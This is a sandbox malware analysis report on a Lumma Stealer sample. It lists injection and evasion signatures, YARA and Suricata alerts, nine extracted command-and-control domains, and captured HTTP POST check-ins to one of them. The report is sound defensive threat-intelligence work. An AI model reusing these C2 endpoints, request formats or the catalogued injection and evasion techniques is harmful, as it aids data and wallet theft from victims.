Edit tour

Windows Analysis Report
p37SE6gM52.exe

Overview

General Information

Sample name:	p37SE6gM52.exe renamed because original name is a hash value
Original sample name:	cd68144879cf39befd5d96950a78370d.exe
Analysis ID:	1519287
MD5:	cd68144879cf39befd5d96950a78370d
SHA1:	f22e8d8421fc6b41de89ab747c1c74b3e934ee2e
SHA256:	2ca1aa726259687599cbc1eac5cb922aa247ce62a537dc1506c95855f3e4322a
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC, Go Injector, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Go Injector

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

p37SE6gM52.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\p37SE6gM52.exe" MD5: CD68144879CF39BEFD5D96950A78370D)

BitLockerToGo.exe (PID: 7784 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["surroundeocw.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "deallyharvenw.shop", "covvercilverow.shop", "pianoswimen.shop", "abortinoiwiam.shop"], "Build id": "tLYMe5--rui111"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
p37SE6gM52.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: p37SE6gM52.exe PID: 7324	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.p37SE6gM52.exe.7ff6fc380000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
1.2.p37SE6gM52.exe.7ff6fc380000.6.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:00:13.443829+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49704	104.21.37.97	443	TCP
2024-09-26T10:00:14.794278+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49705	104.21.37.97	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:00:13.443829+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49704	104.21.37.97	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:00:14.794278+0200	2049812	1	A Network Trojan was detected	192.168.2.7	49705	104.21.37.97	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:00:13.288579+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.7	49704	104.21.37.97	443	TCP
2024-09-26T10:00:14.339044+0200	2056079	1	Domain Observed Used for C2 Detected	192.168.2.7	49705	104.21.37.97	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T10:00:12.767379+0200	2056078	1	Domain Observed Used for C2 Detected	192.168.2.7	59476	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: p37SE6gM52.exe

Avira: detected

Antivirus detection for URL or domain

Source: pianoswimen.shop	Avira URL Cloud: Label: malware
Source: surroundeocw.shop	Avira URL Cloud: Label: malware
Source: priooozekw.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/p	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api	Avira URL Cloud: Label: malware
Source: racedsuitreow.shop	Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/	Avira URL Cloud: Label: malware
Source: covvercilverow.shop	Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop	Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop	Avira URL Cloud: Label: malware
Source: deallyharvenw.shop	Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.3.p37SE6gM52.exe.2766edc0000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["surroundeocw.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "deallyharvenw.shop", "covvercilverow.shop", "pianoswimen.shop", "abortinoiwiam.shop"], "Build id": "tLYMe5--rui111"}

Multi AV Scanner detection for submitted file

Source: p37SE6gM52.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.5% probability

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: covvercilverow.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: surroundeocw.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abortinoiwiam.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pumpkinkwquo.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: priooozekw.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: deallyharvenw.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: defenddsouneuw.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: racedsuitreow.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: pianoswimen.shop
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tLYMe5--rui111

Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: p37SE6gM52.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000688000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000002.1725521935.000000C00064E000.00000004.00001000.00020000.00000000.sdmp, p37SE6gM52.exe, 00000001.00000003.1710429168.000002766ED60000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_02B18BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	4_2_02B0DEE8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02ADCD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02ADCD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push ebx	4_2_02B0E20D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_02AED26A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000009E4h]	4_2_02AED26A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+ebp+02h], 0000h	4_2_02AFD260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	4_2_02ADF380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	4_2_02ADF380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02ADF380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001C0h]	4_2_02AE2324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	4_2_02B19310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	4_2_02B19310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	4_2_02AD131E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [eax+ecx]	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [eax]	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000004B0h]	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], ax	4_2_02AEE35A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_02B16080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp al, 2Eh	4_2_02AFB0D7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea eax, dword ptr [esi+04h]	4_2_02AFB0D7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp al, 25h	4_2_02AD1000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, esi	4_2_02AD1000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_02B19000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	4_2_02B19190
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_02AF71F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	4_2_02B18120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02B1417F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then dec eax	4_2_02AD36A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push 00000000h	4_2_02AD36A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+24h], 525E5C56h	4_2_02AFE607
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	4_2_02B12660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	4_2_02ADD670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	4_2_02AEF7B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_02AEF7B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	4_2_02AEF7B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], ax	4_2_02AEF7B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push esi	4_2_02AE0785
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_02B0E79E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push esi	4_2_02AE27F9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_02AF5730
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	4_2_02AD5710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_02AFF4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02AF34D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp edx	4_2_02B18460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [eax+01h], 00000000h	4_2_02AF658F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	4_2_02B17570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_02AFD541
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	4_2_02AFAA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	4_2_02AFAA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0716B6A2h	4_2_02B0DAF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7D006057h	4_2_02B0DAF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000004B0h]	4_2_02AECA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_02AFDB9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02AE0BD3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	4_2_02B16B00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax*4+00h]	4_2_02ADBB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]	4_2_02ADBB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebx], cx	4_2_02B156C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	4_2_02B156C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea esi, dword ptr [esi+esi*4]	4_2_02ADC810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	4_2_02B13840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_02AF59A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_02B09980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	4_2_02AFF9E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [edi]	4_2_02AFE9C6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_02AE9FB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, eax	4_2_02AD9FC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebp, eax	4_2_02AD9FC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	4_2_02B0FFC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	4_2_02B16CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], CF5AC950h	4_2_02ADEC76
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_02AFDD67
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	4_2_02B12DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001B8h]	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], cl	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000088h]	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], cl	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_02B00DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_02AFDD67

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.7:59476 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.7:49704 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.7:49705 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49705 -> 104.21.37.97:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 104.21.37.97:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: surroundeocw.shop
Source: Malware configuration extractor	URLs: defenddsouneuw.shop
Source: Malware configuration extractor	URLs: racedsuitreow.shop
Source: Malware configuration extractor	URLs: priooozekw.shop
Source: Malware configuration extractor	URLs: pumpkinkwquo.shop
Source: Malware configuration extractor	URLs: deallyharvenw.shop
Source: Malware configuration extractor	URLs: covvercilverow.shop
Source: Malware configuration extractor	URLs: pianoswimen.shop
Source: Malware configuration extractor	URLs: abortinoiwiam.shop

Source: Joe Sandbox View

IP Address: 104.21.37.97 104.21.37.97

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: racedsuitreow.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: pianoswimen.shop
Source: global traffic	DNS traffic detected: DNS query: racedsuitreow.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop

Source: p37SE6gM52.exe	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: p37SE6gM52.exe	String found in binary or memory: https://github.com/uber-go/dig/issues/new
Source: p37SE6gM52.exe	String found in binary or memory: https://golang.org/doc/faq#nil_errorMemory
Source: p37SE6gM52.exe	String found in binary or memory: https://opentelemetry.io/schemas/1.26.0google.golang.org/genproto/protobuf/apigoogle.golang.org/prot
Source: p37SE6gM52.exe	String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictserver
Source: BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/
Source: BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/api
Source: BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://racedsuitreow.shop/p
